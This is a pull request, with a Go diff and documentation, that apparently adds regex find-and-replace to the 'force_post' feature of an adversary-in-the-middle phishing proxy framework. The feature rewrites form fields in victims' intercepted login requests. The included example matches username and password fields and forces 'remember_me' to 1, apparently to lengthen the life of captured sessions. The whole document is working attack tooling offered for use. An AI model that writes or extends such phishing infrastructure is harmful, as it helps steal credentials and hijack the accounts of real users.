### PR TITLE
add find and replace feature to force_post

### DIFF
--- a/core/http_proxy.go
+++ b/core/http_proxy.go
@@ -646,7 +646,18 @@ func NewHttpProxy(hostname string, port int, cfg *Config, crt_db *CertDb, db *da
 
 										if ok_search {
 											for _, fp_f := range fp.force {
-												req.PostForm.Set(fp_f.key, fp_f.value)
+												newValue := fp_f.value
+												if fp_f.search != nil {
+													originalValue := req.PostForm.Get(fp_f.key)
+													matched := fp_f.search.FindString(originalValue)
+													log.Debug("Checking key: %s, value: %s, search: %s", fp_f.key, originalValue, fp_f.search)
+													if matched != "" {
+														// If a match is found, replace it in the original value
+														newValue = strings.ReplaceAll(originalValue, matched, fp_f.value)
+													}
+												}
+												// Set the (possibly updated) value in the form
+												req.PostForm.Set(fp_f.key, newValue)
 											}
 											body = []byte(req.PostForm.Encode())
 											req.ContentLength = int64(len(body))

--- a/core/phishlet.go
+++ b/core/phishlet.go
@@ -73,8 +73,9 @@ type ForcePostSearch struct {
 }
 
 type ForcePostForce struct {
-	key   string `mapstructure:"key"`
-	value string `mapstructure:"value"`
+	key    string         `mapstructure:"key"`
+	search *regexp.Regexp `mapstructure:"search"`
+	value  string         `mapstructure:"value"`
 }
 
 type ForcePost struct {
@@ -176,8 +177,9 @@ type ConfigForcePostSearch struct {
 }
 
 type ConfigForcePostForce struct {
-	Key   *string `mapstructure:"key"`
-	Value *string `mapstructure:"value"`
+	Key    *string `mapstructure:"key"`
+	Search *string `mapstructure:"search"`
+	Value  *string `mapstructure:"value"`
 }
 
 type ConfigForcePost struct {
@@ -684,13 +686,19 @@ func (p *Phishlet) LoadFromFile(site string, path string, customParams *map[stri
 				if op_f.Key == nil {
 					return fmt.Errorf("force_post: missing force `key` field")
 				}
+				if op_f.Search == nil {
+					return fmt.Errorf("force_post: missing force `search` field")
+				}
 				if op_f.Value == nil {
 					return fmt.Errorf("force_post: missing force `value` field")
 				}
-
 				f_f := ForcePostForce{
 					key:   p.paramVal(*op_f.Key),
 					value: p.paramVal(*op_f.Value),
+				}
+				f_f.search, err = regexp.Compile(p.paramVal(*op_f.Search))
+				if err != nil {
+					return err
 				}
 				fpf.force = append(fpf.force, f_f)
 			}


### PR DESCRIPTION
Add the ability to find and replace a value inside the force_post key-pair. 

This would work in the following way:

First, look for a key-value pair in the POST request body. If a match is found, then look for a particular string pattern inside the value of the key-pair. If the search string is found inside the value, replace only the part of the data that matches - otherwise operate as normal and replace the entire key-value pair.

Hopefully that makes sense. Let me know if any clarification is needed.

Documentation that needs to be updated:

```
force_post:
  - path: '/sessions'
    search:
      - {key: 'session\[user.*\]', search: '.*'}
      - {key: 'session\[pass[a-z]{4}\]', search: '.*'}
    force:
      - {key: 'remember_me', search: '.*', value: '1'}
    type: 'post'
```

- path (regexp): Regular expression to match the URL path the intercepted POST request will be sent to.
- search: Trigger POST arguments. ALL of the defined here POST arguments must be present in the POST request, for the POST arguments to be inserted or replaced.
- key (regexp): Regular expression to match the POST argument key.
- search (regexp): Regular expression to match the POST argument value.
- force: List of POST arguments to insert or replace in intercepted POST request.
- key (string): Name of the POST argument.
- search (regexp): Regular expression to match the value inside the specified key.
- value (string): Value of the POST argument.
- type (string): Type of the POST request to handle. Currently only post is supported.